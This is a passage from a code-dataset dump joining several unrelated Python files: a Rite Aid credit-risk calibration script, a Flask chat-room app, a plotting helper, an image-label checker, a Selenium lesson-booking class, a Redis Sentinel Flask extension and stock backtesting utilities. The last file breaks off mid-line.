Need to get the quarterlies\n# map: date => [ vol, spd, bta, fsp, rte ]\n###################################################\n\n## Put in the liability data (STD,LTD maybe)\nquarterToSomeData = dict()\n\nquarters = STD_data.col_slice( colx=0, start_rowx=0 )\nnEntries_q = len( quarters )\n\nfor i in range( 0, nEntries_q ):\n \n quarter_i = str( STD_data.cell_value( i, 0 ) )\n quarter_i_formatted = quarter_i[2] + \".\" + quarter_i[4:]\n \n quarterToSomeData[ quarter_i_formatted ] = [ float( Lib_data.cell_value( i, 1 ) ) ]\n quarterToSomeData[ quarter_i_formatted ].append( float( STD_data.cell_value( i, 1 ) ) )\n quarterToSomeData[ quarter_i_formatted ].append( float( LTD_data.cell_value( i, 1 ) ) )\n\n\n\n###################################################\n# @ this point, the quarterToSomeData\n# map maps quarter=> [lib, std, ltd]\n# we need to go through each date in the \n# dateToData map, and see what quarter it's in. \n# reference this quarter, and put each value in the \n# dateToData map\n###################################################\n\nfor date in dateToData:\n \n ## get values\n for elm in quarterToSomeData[ dateToQuarter(date) ]:\n \n dateToData[ date ].append( elm )\n \n\n###################################################\n# @ this point, the dateToData map contains\n# everything except Equity, the special case.\n# Set up the equity map first, \n# quarter to Equity values\n###################################################\n\n## Put in the Equity data\nquarterToEquity = dict()\n\nquarters_Eqt = Eqt_data.col_slice( colx=0, start_rowx=0 )\nnEntries_Eqt = len( quarters_Eqt )\n\nfor i in range( 0, nEntries_Eqt ):\n \n quarter_i = str( Eqt_data.cell_value( i, 0 ) )\n quarter_i_formatted = quarter_i[2] + \".\" + quarter_i[4:]\n \n quarterToEquity[ quarter_i_formatted ] = float( Eqt_data.cell_value( i, 1 ) )\n\n\n###################################################\n# @ this point, the quarterToEquity map\n# is set up. Set up quarter=>#ofShares map\n###################################################\n\n## Put in number shares\nquarterToNumShares = dict()\n \nfor i in range( 0, len(dateList) ):\n \n date = dateList[i]\n \n weekend_check = dateWeekendBool[date]\n day_month = date[:-5]\n \n if firstDayCheck( day_month ) and (weekend_check==True):\n \n quarter = dateToQuarter( date )\n fsp = dateToData[ date ][4]\n Equity_val = quarterToEquity[ quarter ]\n numShares = Equity_val*1000000/float(fsp)\n\n # insert into quarterToNumShares map\n quarterToNumShares[ quarter ] = numShares\n \n if firstDayCheck( day_month ) and (weekend_check==False):\n \n temp_i = i #save the location of i\n while( dateWeekendBool[ dateList[i] ] == False ):\n \n i+=1\n \n date_i = dateList[i] #save the next non-weekend date\n i = temp_i #refresh to true position of i\n \n quarter = dateToQuarter( date_i )\n fsp = dateToData[ date_i ][4]\n Equity_val = quarterToEquity[ quarter ]\n numShares = Equity_val*1000000/float(fsp)\n\n # insert into quarterToNumShares map\n quarterToNumShares[ quarter ] = numShares\n \n\n###################################################\n# @ this point, the quarterToNumShares map\n# is set up. 
Now we just need to put Equity\n# into the dateToData map\n###################################################\n\nfor date in dateToData:\n \n quarter = dateToQuarter( date )\n numShares = quarterToNumShares[ quarter ]\n \n dateToData[date].append(numShares)\n \n\n#print(dateToData)\n\n###################################################\n# @ this point, everything is in the dataFrame\n# just need to do math\n###################################################\n \n#############################################\n# Now that all the data is centralized,\n# use the paramters to do the computations\n#############################################\n\n\nA_init = 70000000\nsigmaA_init = 0.2\ninit_guess = [A_init, sigmaA_init]\nM = 5.0 # assume\n\n\noutFile = open('riteAid_testingFile.csv','w')\nbetaBM_List = list()\nfor k in dateToData.keys():\n \n #define input parameters for calibration\n sig_E = dateToData[k][1]/100.0\n spd = dateToData[k][2]\n bta = dateToData[k][3]\n fsp = dateToData[k][4]\n r = dateToData[k][5]/100.0\n B = dateToData[k][6]*1000000\n STD = dateToData[k][7]*1000000\n LTD = dateToData[k][8]*1000000\n numShares = dateToData[k][9]\n E = float(fsp*numShares)*1000000\n N_Moody = STD+0.5*LTD \n N_Liab = B\n A = B + E\n \n initial_guess = [0.2, N_Moody]\n\n if (spd != 0.0):\n \n try:\n \n CalibSigA, CalibN = fsolve( fsolve_function, initial_guess, args=(E, sig_E, r, M, A) )\n \n \"\"\" \n print(\"\\n====DEBUG====\")\n print(\"sigE: \", sig_E)\n print(\"spd_phys: \", spd)\n print(\"beta_EM: \", bta)\n print(\"fStockPrice: \", fsp)\n print(\"rate: \", r)\n print(\"Liabilities: \", B)\n print(\"STD: \", STD)\n print(\"LTD: \", LTD)\n print(\"N_Moodys: \", N_Moody)\n print(\"N_Moodys/B: \", N_Moody/float(B))\n print(\"Equity: \", E)\n print(\"CalibSigA: \", CalibSigA)\n print(\"CalibN: \", CalibN)\n print(\"B/CalibN: \", B/float(CalibN))\n \"\"\"\n \n ## Get d1/d2\n d1 = (math.log(A/CalibN) + ((r + 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M))\n d2 = (math.log(A/CalibN) + ((r - 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M)) \n \n beta_BM = (E*norm.cdf(-1.0*d1)*bta)/float(B*norm.cdf(d1))\n phi_d1 = norm.cdf(d1)\n \n if (beta_BM < 0):\n \n print(\"\\n====DEBUG====\")\n print(\"sigE: \", sig_E)\n print(\"spd_phys: \", spd)\n print(\"beta_EM: \", bta)\n print(\"rate: \", r)\n print(\"Liabilities: \", B)\n print(\"STD: \", STD)\n print(\"LTD: \", LTD)\n print(\"N_Moodys: \", N_Moody)\n print(\"N_Moodys/B: \", N_Moody/float(B))\n print(\"numShares: \", numShares)\n print(\"fStockPrice: \", fsp)\n print(\"Equity: \", E)\n print(\"CalibSigA: \", CalibSigA)\n print(\"CalibN: \", CalibN)\n print(\"B/CalibN: \", B/float(CalibN))\n print(\"beta_BM: \", beta_BM)\n \n# print(\"\\n====DEBUG====\")\n# print(\"CalibSigA: \", CalibSigA)\n# print(\"CalibN: \", CalibN)\n# print(\"beta_BM: \", beta_BM)\n \n betaBM_List.append(beta_BM)\n \n ## Calculate S^Physical - S^Calibrate\n d_spread, calib_spread = delta_spread( A, CalibSigA, E, sig_E, CalibN, r, M, spd )\n \n #print(\"deltaSpread: \", d_spread)\n\n outStr = str(bta) + \",\" + str(beta_BM) + \",\" + str(d_spread) + \",\" + str(spd) + \",\" + str(calib_spread) + \"\\n\"\n outFile.write( outStr )\n\n \"\"\"\n ## Get LGD / Beta_BM (Beta_EM*constants)\n LGD = 1.0 - ( ( math.exp(r*M) * A * norm.cdf(-d1) ) / ( N*norm.cdf(-d2) ) )\n PD = norm.cdf(-d1)\n #bta_BM = ( (norm.cdf(-d1)*E*1000000*bta) / (float(B*norm.cdf(d1))) )\n bta_BM = ( (norm.cdf(-d1)*E*1000000*bta) / (float(B*norm.cdf(d1))) )\n #print(\"Beta_BM: \", bta_BM)\n \n# print(\"\\n SigA: \", 
CalibSigA)\n# print(\"Beta_BM: \", bta_BM)\n\n \n beta_BM_list.append(bta_BM)\n beta_EM_list.append(bta)\n \n ## Output, all files\n out_str = str(bta_BM) + \",\" + str(bta) + \",\" + str(d_spread) + \"\\n\"\n fc_dspreadFile2.write( out_str )\n \n out_str2 = str(bta) + \",\" + str(LGD) + \",\" + str(PD) + \"\\n\"\n fc_PdFile.write( out_str2 )\n \n out_str3 = k + \",\" + str(PD) + \",\" + str(spd) + \"\\n\"\n fc_PdSpread.write( out_str3 )\n \n out_str4 = str(PD) + \",\" + str(LGD) + \"\\n\"\n last_doc.write( out_str4 )\n \n out_str5 = str(cnt) + \",\" + str(PD) + \"\\n\"\n fc_TimeSeries.write( out_str5 )\n \n out_str6 = str(E) + \",\" + str(spd) + \"\\n\"\n fc_betaEBFile.write( out_str6 )\n \n out_str7 = str(CalibSigA) + \",\" + str(bta_BM) + \"\\n\"\n sigA_BtaBM.write( out_str7 )\n \n #count_list.append(cnt)\n cnt+=1\n \n \"\"\"\n \n except ValueError:\n \n continue\n \n \n\n#print(\"\\nbetaBM_List_avg: \", sum(betaBM_List)/float(len(betaBM_List)))\n\n#fc_dspreadFile2.close()\n#fc_PdFile.close()\n#fc_PdSpread.close()\n#last_doc.close()\n#fc_betaEBFile.close()\n","sub_path":"RiteAid/RiteAid_5_9_2017.py","file_name":"RiteAid_5_9_2017.py","file_ext":"py","file_size_in_byte":15007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384030189","text":"from flask import Flask, redirect, render_template, request, url_for\nfrom flask_login import LoginManager, current_user, login_required, login_user, logout_user\nfrom flask_socketio import SocketIO, join_room, leave_room, send\nfrom db import (add_room_members, get_messages, get_user, save_msg, save_room,\n save_user, get_rooms_for_user, get_room, is_room_member,\n get_room_members, is_room_admin, update_room, remove_room_members,\n update_admin, remove_admin, add_room_member, remove_room_member,\n check_user, get_email, delete_room)\nfrom datetime import datetime\nfrom bson.json_util import dumps\n\n\napp = Flask(__name__)\napp.secret_key = 'Centigrade'\nsocketio = SocketIO(app)\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login'\nlogin_manager.init_app(app)\n\n\n@app.route('/')\ndef home():\n rooms = []\n have_rooms = False\n\n if current_user.is_authenticated:\n rooms = get_rooms_for_user(current_user.username)\n a = len(rooms)\n if a == 0:\n have_rooms = False\n else:\n have_rooms = True\n return render_template('index.html', rooms=rooms, have_rooms=have_rooms)\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n message = ''\n if request.method == \"POST\":\n username = request.form.get('username')\n password_input = request.form.get('password')\n user = get_user(username)\n\n if user and user.check_password(password_input):\n login_user(user)\n return redirect(url_for('home', username=current_user.username))\n else:\n message = 'Failed to login'\n\n return render_template('login.html', message=message)\n\n\n@app.route('/signup', methods=[\"GET\", \"POST\"])\ndef signup():\n message = ''\n if request.method == \"POST\":\n username = request.form.get('username')\n password = request.form.get('password')\n email_address = request.form.get('email')\n user = get_user(username)\n message = 'ㅤ'\n if user:\n message = '{} already exist'.format(username)\n else:\n save_user(username, password, email_address)\n\n return redirect(url_for('login'))\n\n return render_template('signup.html', message=message)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return 
redirect(url_for('home'))\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\n@login_required\ndef create_room():\n message = ''\n rooms = get_rooms_for_user(current_user.username)\n if request.method == \"POST\":\n room_name = request.form.get('room_name')\n usernames = [username.strip()\n for username in request.form.get('members').split(',')]\n\n if len(room_name):\n for username in usernames:\n user = check_user(username)\n if username == \"\": \n \n break\n elif user ==None :\n print(\"bruhh\")\n message = f\"user:\\\"{username}\\\" doesn't exist\"\n return render_template('index.html', message1=message, have_rooms=True, rooms=rooms)\n break\n room_id = save_room(room_name, current_user.username)\n if current_user.username in usernames:\n usernames.remove(current_user.username)\n add_room_members(room_id, room_name, usernames,\n current_user.username)\n return redirect(url_for('chat_room', room_id=room_id))\n else:\n message = 'Failed to Create room'\n\n return render_template('index.html', message1=message, have_rooms=True, rooms=rooms)\n\n\n@app.route('/rooms/<room_id>/edit', methods=[\"POST\", \"GET\"])\n@login_required\ndef edit_room(room_id):\n room = get_room(room_id)\n admins = []\n not_admin = []\n error_msg = ''\n message = ''\n if room and is_room_admin(room_id, current_user.username):\n\n members = get_room_members(room_id)\n members_list = [username['_id']['username'] for username in members]\n for member in members:\n if is_room_admin(room_id, member['_id']['username']):\n admins.append(member['_id']['username'])\n else:\n not_admin.append(member['_id']['username'])\n if request.method == \"POST\":\n room_name = request.form.get('room_name')\n room['name'] = room_name\n update_room(room_id, room_name)\n make_admin = request.form.get('makeAdmin')\n removeAdmin = request.form.get('removeAdmin')\n add_member = request.form.get('addmember')\n rem_mem = request.form.get('remove_user')\n rem_room = request.form.get('delete_room')\n\n if make_admin:\n try:\n update_admin(room_id, make_admin)\n message = '{} is now an Admin🥳'.format(make_admin)\n except:\n error_msg = 'Some error occured'\n\n if removeAdmin:\n try:\n if len(admins) > 1:\n remove_admin(room_id, removeAdmin)\n message = '{} is no longer an Admin'.format(\n removeAdmin)\n else:\n message = 'Atleast one admin should be present'\n except:\n error_msg = 'Some error occured'\n\n if add_member:\n try:\n user = check_user(add_member)\n if user:\n if add_member not in members_list:\n add_mems = [username.strip()\n for username in add_member.split(',')]\n add_room_members(room_id, room_name, add_mems,\n current_user.username)\n message = '\\\"{}\\\" added successfully'.format(\n add_member)\n else:\n message = \"\\\"{}\\\" already in room\".format(\n add_member)\n else:\n message = \"\\\"{}\\\" does not exist :(\".format(add_member)\n except:\n error_msg = \"Some error occured\"\n\n if rem_mem:\n is_admin = is_room_admin(room_id, rem_mem)\n try:\n if len(members_list) > 1:\n if is_admin and len(admins) == 1:\n message = 'Atleast one Admin should be present '\n else:\n remove_room_member(room_id, rem_mem)\n message = '{} removed successfully'.format(rem_mem)\n else:\n message = 'Atleast one member should be present'\n except:\n error_msg = \"Some error occured\"\n if rem_room == 'Remove':\n try:\n for member in members_list:\n print(\"hi\")\n remove_room_member(room_id, member)\n delete_room(room_id)\n return redirect(url_for('home'))\n\n except:\n error_msg = \"Some error oocured\"\n\n # return 
redirect(url_for('edit_room',room_id=room_id,message = message))\n\n return render_template('edit_room.html', not_admin=not_admin, admins=admins, room=room, members=members, error_msg=error_msg, room_id=room_id, message=message)\n\n else:\n return render_template('404.html', message='Only admins can Edit Room', room_id=room_id)\n\n\n@app.route('/rooms/<room_id>/')\n@login_required\ndef chat_room(room_id):\n rooms = get_rooms_for_user(current_user.username)\n room = get_room(room_id)\n email = get_email(current_user.username)\n admins = []\n not_admin = []\n if room and is_room_member(room_id, current_user.username):\n room_members = get_room_members(room_id)\n for member in room_members:\n if is_room_admin(room_id, member['_id']['username']):\n admins.append(member['_id']['username'])\n else:\n not_admin.append(member['_id']['username'])\n\n messages = get_messages(room_id)\n return render_template('chat.html', admins=admins, rooms=rooms, username=current_user.username, not_admin=not_admin, email=email, room=room, room_members=room_members, room_id=room_id, messages=messages)\n else:\n\n return render_template('404.html', message='Room does not exist')\n\n\n\"\"\" @app.route('/rooms/<room_id>/messages/')\n@login_required\ndef get_older_message(room_id):\n room = get_room(room_id)\n if room and is_room_member(room_id, current_user.username):\n page = int(request.args.get('page', 0))\n messages = get_messages(room_id, page)\n return dumps(messages)\n else:\n return \"Room not found\", 404\n \"\"\"\n\n\n@socketio.on('send_msg')\ndef handle_send_message_event(data):\n data['created_at'] = datetime.now().strftime(\"%d %b, %H:%M \")\n save_msg(data['room'], data['message'], data['username'])\n socketio.emit('receive_msg', data, room=data['room'])\n\n\n@socketio.on('leave_room')\ndef leaving_room(data):\n remove_room_member(data['room'], current_user.username)\n leave_room(data['room'])\n socketio.emit('leave_room_announcement', data, room=data['room'])\n\n\n@socketio.on('join_room')\ndef joinning_room(data):\n messages = get_messages(data['room'])\n join_room(data['room'])\n socketio.emit('join_room_announcement', data,\n room=data['room'], messages=messages)\n\n\n@login_manager.user_loader\ndef load_user(username):\n return get_user(username)\n\n\nif __name__ == \"__main__\":\n socketio.run(app, host='0.0.0.0') # uncomment this before deployment\n # comment this before deployment (this is used for running debug server)\n #socketio.run(app, debug=\"True\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"334449739","text":"from prettyplotlib.utils import remove_chartjunk, maybe_get_ax, maybe_get_linewidth\nfrom prettyplotlib.colors import almost_black, pretty\n\n\n@pretty\ndef fill_between(*args, **kwargs):\n ax, args, kwargs = maybe_get_ax(*args, **kwargs)\n\n lw = maybe_get_linewidth(**kwargs)\n kwargs['linewidths'] = lw\n\n if 'color' not in kwargs:\n # if no color is specified, cycle over the ones in this axis\n color_cycle = ax._get_lines.color_cycle\n kwargs['color'] = next(color_cycle)\n if 'edgecolor' not in kwargs:\n kwargs['edgecolor'] = almost_black\n\n show_ticks = kwargs.pop('show_ticks', False)\n\n lines = ax.fill_between(*args, **kwargs)\n remove_chartjunk(ax, ['top', 'right'], show_ticks=show_ticks)\n return 
ax\n","sub_path":"prettyplotlib/_fill_between.py","file_name":"_fill_between.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"413172766","text":"#coding:utf-8\n\nimport numpy as np\nimport sys\nimport os\nimport cv2\nfrom tqdm import tqdm\nfrom ulitities.base_functions import load_img, get_file\n\nFLAG_USING_UNET = True\nsegnet_labels = [0, 1, 2] # have not test for segnetlabels\nunet_labels = [0, 1]\n\ninput_src_path = '../../data/originaldata/unet/roads/src/'\ninput_label_path = '../../data/originaldata/unet/roads/label/'\n\nHAS_INVALID_VALUE = False\n\n\ndef make_label_valid(img, true_values):\n height, width = img.shape\n for i in range(height):\n for j in range(width):\n tmp = img[i,j]\n if not tmp in true_values:\n print(\"img[{},{}]: {}\".format(i,j,tmp))\n img[i,j]=0\n return img\n\n\nif __name__ == '__main__':\n src_files,num = get_file(input_src_path)\n assert (num!=0)\n\n valid_labels = []\n if FLAG_USING_UNET:\n valid_labels = unet_labels\n else:\n valid_labels = segnet_labels\n\n for src_file in tqdm(src_files):\n label_file = input_label_path + os.path.split(src_file)[1]\n\n ret,src_img = load_img(src_file)\n assert(ret==0)\n\n ret,label_img = load_img(label_file, grayscale=True)\n assert (ret == 0)\n\n local_labels = np.unique(label_img)\n\n for tmp in local_labels:\n if tmp not in valid_labels:\n print (\"\\nWarning: some label is not valid value\")\n print (\"\\nFile: {}\".format(label_file))\n HAS_INVALID_VALUE = True\n\n\n if HAS_INVALID_VALUE == True:\n new_label_img = make_label_valid(label_img, valid_labels)\n cv2.imwrite(label_file, new_label_img)\n HAS_INVALID_VALUE = False\n\n\n\n\n\n","sub_path":"samples_produce/check_original_labels.py","file_name":"check_original_labels.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286668998","text":"from selenium.webdriver.remote.webdriver import WebDriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nclass Reservation_Manager:\n def __init__(self, driver: WebDriver):\n self.driver = driver\n \n def new_reservation(self):\n reservation_element = WebDriverWait(self.driver,10).until(\n EC.element_to_be_clickable(\n (By.CSS_SELECTOR, 'img[alt=\"Prenota il tuo posto a lezione\"]'))\n )\n self.driver.execute_script(\"arguments[0].scrollIntoView(true);\", reservation_element)\n reservation_element.click()\n\n new_reservation_element = self.driver.find_element_by_css_selector(\n 'img[src=\"customer/sub_home_icons/easylesson_aggiungi.png\"]'\n )\n new_reservation_element.click()\n\n def get_lessons(self):\n lessons_elements = self.driver.find_elements_by_css_selector(\n 'a[title=\"Verifica e prenota il tuo posto\"]'\n )\n lessons_elements_booked = self.driver.find_elements_by_css_selector(\n 'a[title=\"Annulla la tua prenotazione\"]'\n )\n\n lessons_id = [\n lessons_element.get_attribute(\"id\") \n for lessons_element in lessons_elements \n if lessons_element.get_attribute(\"id\") not in lessons_elements_booked\n ]\n\n return lessons_id\n \n def make_reservation(self, lessons_id: list):\n self.lessons_id = lessons_id\n\n for i in range(len(self.lessons_id)):\n link_element = 
self.driver.find_element_by_id(self.lessons_id[i])\n link_element.click()\n \n close_element = WebDriverWait(self.driver,10).until(\n EC.element_to_be_clickable(\n (By.CSS_SELECTOR, 'button[class=\"mfp-close\"]'))\n )\n close_element.click()\n","sub_path":"Reservation/reservation_manager.py","file_name":"reservation_manager.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162196176","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: e:\\opt\\private\\cw1427\\fab-admin\\fab_admin\\fab_manager_overwrite\\flask_redis_sentinel.py\n# Compiled at: 2020-02-11 09:22:57\n# Size of source mod 2**32: 7008 bytes\nimport six, inspect, redis, redis.sentinel, redis_sentinel_url\nfrom flask import current_app\nfrom werkzeug.local import Local, LocalProxy\nfrom werkzeug.utils import import_string\nimport logging\nlog = logging.getLogger(__name__)\n_EXTENSION_KEY = 'redissentinel'\n\nclass RedisSentinelInstance(object):\n\n def __init__(self, url, client_class, client_options, sentinel_class, sentinel_options):\n self.url = url\n self.client_class = client_class\n self.client_options = client_options\n self.sentinel_class = sentinel_class\n self.sentinel_options = sentinel_options\n self.local = Local()\n self._connect()\n if self.local.connection[0] is None:\n self.connection = self.local.connection\n self.local = self\n\n def _connect(self):\n try:\n return self.local.connection\n except AttributeError:\n conn = redis_sentinel_url.connect((self.url),\n sentinel_class=(self.sentinel_class),\n sentinel_options=(self.sentinel_options),\n client_class=(self.client_class),\n client_options=(self.client_options))\n self.local.connection = conn\n return conn\n\n @property\n def sentinel(self):\n return self._connect()[0]\n\n @property\n def default_connection(self):\n return self._connect()[1]\n\n def master_for(self, service_name, **kwargs):\n try:\n return self.local.master_connections[service_name]\n except AttributeError:\n self.local.master_connections = {}\n except KeyError:\n pass\n\n sentinel = self.sentinel\n if sentinel is None:\n msg = 'Cannot get master {} using non-sentinel configuration'\n raise RuntimeError(msg.format(service_name))\n conn = (sentinel.master_for)(service_name, redis_class=self.client_class, **kwargs)\n self.local.master_connections[service_name] = conn\n return conn\n\n def slave_for(self, service_name, **kwargs):\n try:\n return self.local.slave_connections[service_name]\n except AttributeError:\n self.local.slave_connections = {}\n except KeyError:\n pass\n\n sentinel = self.sentinel\n if sentinel is None:\n msg = 'Cannot get slave {} using non-sentinel configuration'\n raise RuntimeError(msg.format(service_name))\n conn = (sentinel.slave_for)(service_name, redis_class=self.client_class, **kwargs)\n self.local.slave_connections[service_name] = conn\n return conn\n\n\nclass RedisSentinel(object):\n __doc__ = 'Flask extension that supports connections to master using Redis Sentinel.\\n\\n Supported URL types:\\n redis+sentinel://\\n redis://\\n rediss://\\n unix://\\n '\n\n def __init__(self, app=None, config_prefix='REDIS', client_class=None, sentinel_class=None):\n self.config_prefix = config_prefix\n self.client_class = client_class\n self.sentinel_class = sentinel_class\n if app is not None:\n self.init_app(app)\n self.sentinel = LocalProxy(lambda : 
self.get_instance().sentinel)\n self.default_connection = LocalProxy(lambda : self.get_instance().default_connection)\n\n def init_app(self, app, config_prefix=None, client_class=None, sentinel_class=None):\n config_prefix = config_prefix or self.config_prefix\n app.config.setdefault(config_prefix + '_' + 'URL', 'redis://localhost/0')\n config = self._strip_dict_prefix(app.config, config_prefix + '_')\n extensions = app.extensions.setdefault(_EXTENSION_KEY, {})\n if config_prefix in extensions:\n msg = 'Redis sentinel extension with config prefix {} is already registered'\n raise RuntimeError(msg.format(config_prefix))\n client_class = self._resolve_class(config, 'CLASS', 'client_class', client_class, redis.StrictRedis)\n sentinel_class = self._resolve_class(config, 'SENTINEL_CLASS', 'sentinel_class', sentinel_class, redis.sentinel.Sentinel)\n url = config.pop('URL')\n client_options = self._config_from_variables(config, client_class)\n sentinel_options = self._config_from_variables(self._strip_dict_prefix(config, 'SENTINEL_'), client_class)\n extensions[config_prefix] = RedisSentinelInstance(url, client_class, client_options, sentinel_class, sentinel_options)\n self.config_prefix = config_prefix\n\n def _resolve_class(self, config, config_key, attr, the_class, default_class):\n if the_class is None:\n the_class = getattr(self, attr)\n if the_class is None:\n the_class = config.get(config_key, default_class)\n if isinstance(the_class, six.string_types):\n the_class = import_string(the_class)\n config.pop(config_key, None)\n return the_class\n\n @staticmethod\n def _strip_dict_prefix(orig, prefix):\n return {k[len(prefix):]:v for k, v in six.iteritems(orig) if k.startswith(prefix)}\n\n @staticmethod\n def _config_from_variables(config, the_class):\n args = inspect.getargspec(the_class.__init__).args\n base_args = inspect.getargspec(redis.client.Redis.__init__).args\n args.extend(base_args)\n args.remove('self')\n args.remove('host')\n args.remove('port')\n args.remove('db')\n return {arg:config[arg.upper()] for arg in args if arg.upper() in config}\n\n def get_instance(self):\n app = current_app._get_current_object()\n if _EXTENSION_KEY not in app.extensions or self.config_prefix not in app.extensions[_EXTENSION_KEY]:\n msg = 'Redis sentinel extension with config prefix {} was not initialized for application {}'\n raise RuntimeError(msg.format(self.config_prefix, app.import_name))\n return app.extensions[_EXTENSION_KEY][self.config_prefix]\n\n def master_for(self, service_name, **kwargs):\n return LocalProxy(lambda : (self.get_instance().master_for)(service_name, **kwargs))\n\n def slave_for(self, service_name, **kwargs):\n return LocalProxy(lambda : (self.get_instance().slave_for)(service_name, **kwargs))\n\n\nSentinelExtension = RedisSentinel","sub_path":"pycfiles/fab-admin-0.1.5.tar/flask_redis_sentinel.cpython-36.py","file_name":"flask_redis_sentinel.cpython-36.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294510118","text":"import pandas as pd\nimport numpy as np\n\nfrom pyfolio import timeseries\nimport pyfolio\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom copy import deepcopy\n\nimport yfinance as yf\n\n\nclass YahooDownloader:\n \"\"\"Provides methods for retrieving daily stock data from\n Yahoo Finance API\n\n Attributes\n ----------\n start_date : str\n start date of the data (modified from config.py)\n end_date : str\n end date of the data (modified 
from config.py)\n ticker_list : list\n a list of stock tickers (modified from config.py)\n\n Methods\n -------\n fetch_data()\n Fetches data from yahoo API\n\n \"\"\"\n\n def __init__(self, start_date: str, end_date: str, ticker_list: list):\n\n self.start_date = start_date\n self.end_date = end_date\n self.ticker_list = ticker_list\n\n def fetch_data(self) -> pd.DataFrame:\n \"\"\"Fetches data from Yahoo API\n Parameters\n ----------\n\n Returns\n -------\n `pd.DataFrame`\n 7 columns: A date, open, high, low, close, volume and tick symbol\n for the specified stock ticker\n \"\"\"\n # Download and save the data in a pandas DataFrame:\n data_df = pd.DataFrame()\n for tic in self.ticker_list:\n temp_df = yf.download(tic, start=self.start_date, end=self.end_date)\n temp_df[\"tic\"] = tic\n data_df = data_df.append(temp_df)\n # reset the index, we want to use numbers as index instead of dates\n data_df = data_df.reset_index()\n try:\n # convert the column names to standardized names\n data_df.columns = [\n \"date\",\n \"open\",\n \"high\",\n \"low\",\n \"close\",\n \"adjcp\",\n \"volume\",\n \"tic\",\n ]\n # use adjusted close price instead of close price\n data_df[\"close\"] = data_df[\"adjcp\"]\n # drop the adjusted close price column\n data_df = data_df.drop(\"adjcp\", 1)\n except NotImplementedError:\n print(\"the features are not supported currently\")\n # create day of the week column (monday = 0)\n data_df[\"day\"] = data_df[\"date\"].dt.dayofweek\n # convert date to standard string format, easy to filter\n data_df[\"date\"] = data_df.date.apply(lambda x: x.strftime(\"%Y-%m-%d\"))\n # drop missing data\n data_df = data_df.dropna()\n data_df = data_df.reset_index(drop=True)\n print(\"Shape of DataFrame: \", data_df.shape)\n # print(\"Display DataFrame: \", data_df.head())\n\n data_df = data_df.sort_values(by=['date','tic']).reset_index(drop=True)\n\n return data_df\n\n def select_equal_rows_stock(self, df):\n df_check = df.tic.value_counts()\n df_check = pd.DataFrame(df_check).reset_index()\n df_check.columns = [\"tic\", \"counts\"]\n mean_df = df_check.counts.mean()\n equal_list = list(df.tic.value_counts() >= mean_df)\n names = df.tic.value_counts().index\n select_stocks_list = list(names[equal_list])\n df = df[df.tic.isin(select_stocks_list)]\n return df\n\n\n\n\ndef get_daily_return(df, value_col_name=\"account_value\"):\n df = deepcopy(df)\n df[\"daily_return\"] = df[value_col_name].pct_change(1)\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n df.set_index(\"date\", inplace=True, drop=True)\n df.index = df.index.tz_localize(\"UTC\")\n return pd.Series(df[\"daily_return\"], index=df.index)\n\ndef convert_daily_return_to_pyfolio_ts(df):\n strategy_ret= df.copy()\n strategy_ret['date'] = pd.to_datetime(strategy_ret['date'])\n strategy_ret.set_index('date', drop = False, inplace = True)\n strategy_ret.index = strategy_ret.index.tz_localize('UTC')\n del strategy_ret['date']\n ts = pd.Series(strategy_ret['daily_return'].values, index=strategy_ret.index)\n return ts\n\ndef backtest_stats(account_value, value_col_name=\"account_value\"):\n dr_test = get_daily_return(account_value, value_col_name=value_col_name)\n perf_stats_all = timeseries.perf_stats(\n returns=dr_test,\n positions=None,\n transactions=None,\n turnover_denom=\"AGB\",\n )\n print(perf_stats_all)\n return perf_stats_all\n\n\ndef backtest_plot(\n account_value,\n baseline_start,\n baseline_end,\n baseline_ticker=\"^DJI\",\n value_col_name=\"account_value\",\n):\n\n df = deepcopy(account_value)\n test_returns = 
get_daily_return(df, value_col_name=value_col_name)\n\n baseline_df = get_baseline(\n ticker=baseline_ticker, start=baseline_start, end=baseline_end\n )\n\n baseline_returns = get_daily_return(baseline_df, value_col_name=\"close\")\n with pyfolio.plotting.plotting_context(font_scale=1.1):\n pyfolio.create_full_tear_sheet(\n returns=test_returns, benchmark_rets=baseline_returns, set_context=False\n )\n\n\ndef get_baseline(ticker, start, end):\n dji = YahooDownloader(\n start_date=start, end_date=end, ticker_list=[ticker]\n ).fetch_data()\n return dji\n\n\ndef trx_plot(df_trade,df_actions,ticker_list): \n df_trx = pd.DataFrame(np.array(df_actions['transactions'].to_list()))\n df_trx.columns = ticker_list\n df_trx.index = df_actions['date']\n df_trx.index.name = ''\n \n for i in range(df_trx.shape[1]):\n df_trx_temp = df_trx.iloc[:,i]\n df_trx_temp_sign = np.sign(df_trx_temp)\n buying_signal = df_trx_temp_sign.apply(lambda x: True if x>0 else False)\n selling_signal = df_trx_temp_sign.apply(lambda x: True if x<0 else False)\n \n tic_plot = df_trade[(df_trade['tic']==df_trx_temp.name) & (df_trade['date'].isin(df_trx.index))]['close']\n tic_plot.index = 